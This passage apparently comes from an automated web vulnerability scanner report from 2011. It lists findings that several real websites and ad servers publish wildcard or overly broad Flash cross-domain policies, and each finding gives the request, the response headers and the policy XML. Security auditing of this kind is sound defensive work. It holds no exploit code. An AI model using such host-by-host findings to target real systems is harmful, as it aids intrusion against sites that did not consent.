Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.26. http://p.ace.advertising.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:17:39 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.27. http://preps.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://preps.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: preps.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://preps.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.28. http://profootball.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://profootball.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: profootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://profootball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.29. http://r1.ace.advertising.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:12 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 29 Jan 2011 15:17:01 GMT
Expires: Thu, 27 Jan 2011 15:16:53 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 39693
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.31. http://sas.ooyala.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sas.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: sas.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:49:00 GMT
Status: 200 OK
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 344
Expires: Sun, 30 Jan 2011 13:49:00 GMT
Cache-Control: public, must-revalidate, max-age=3600

<?xml version='1.0'?>
<!DOCTYPE cross-domain-policy SYSTEM 'http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd'>
<cross-domain-policy>
<site-control permitted-cross-domain-polic
...[SNIP]...
<allow-access-from domain='*' />
...[SNIP]...

6.32. https://secure.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: https://secure.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:ab5"
Server: Microsoft-IIS/6.0
Server: Secure1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:34:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.33. http://stj.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stj.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca02
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:34:37 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.34. http://whitepg-images.adbureau.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepg-images.adbureau.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: whitepg-images.adbureau.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 23 May 2008 20:34:17 GMT
ETag: "30dd55-60-44debc0f86440"
Accept-Ranges: bytes
Content-Length: 96
Content-Type: text/xml
Cache-Control: max-age=86158
Expires: Mon, 31 Jan 2011 01:47:57 GMT
Date: Sun, 30 Jan 2011 01:51:59 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.35. http://wrapper.g.redacted/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.g.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wrapper.g.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 29 Sep 2009 20:50:08 GMT
Accept-Ranges: bytes
ETag: "81a1fd6d4641ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 346

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.36. http://www.morningstar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morningstar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.morningstar.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 16:15:25 GMT
Accept-Ranges: bytes
ETag: "e88bdab52ec4c91:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:54:04 GMT
Connection: close
Set-Cookie: fp=015129635244320254; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.37. http://www.scout.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.38. http://www.terra.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.terra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.175600; path=/; expires=Fri, 01-Jan-2016 00:02:31 GMT; domain=.terra.com
Last-Modified: Fri, 11 Jan 2008 15:27:05 GMT
ETag: "17bb6-91-44373f5718440"
Accept-Ranges: bytes
Content-Length: 145
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.terra.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.39. http://www.webmd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://www.webmd.com/crossdomain.xml
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:7ec"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:04:07 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.40. http://ad.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:39:18 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "61f4da-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.41. http://admedia.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://admedia.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admedia.wsod.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:22 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n35 ( iad-agg-n36), rf-ht iad-agg-n36 ( origin>CONN)
Cache-Control: max-age=259200
Expires: Wed, 02 Feb 2011 02:05:22 GMT
Age: 0
Content-Length: 821
Content-Type: text/xml
Last-Modified: Tue, 16 Feb 2010 21:41:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tumri.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tcgmsrv.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.teracent.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ytsa.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

6.42. http://alex-johnson.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: alex-johnson.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=968
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.43. http://athima-chansanchai.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: athima-chansanchai.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=973
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.44. http://bodyodd.msnbc.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bodyodd.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bodyodd.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:06:09 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.45. http://boyle.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: boyle.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=989
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.46. http://cartoonblog.msnbc.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cartoonblog.msnbc.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cartoonblog.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:06:16 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.47. http://cdn.modules.ooyala.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.modules.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.modules.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Cache-Control: public, max-age=259200
Date: Sun, 30 Jan 2011 12:49:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.48. http://dateline.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dateline.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dateline.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:03 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
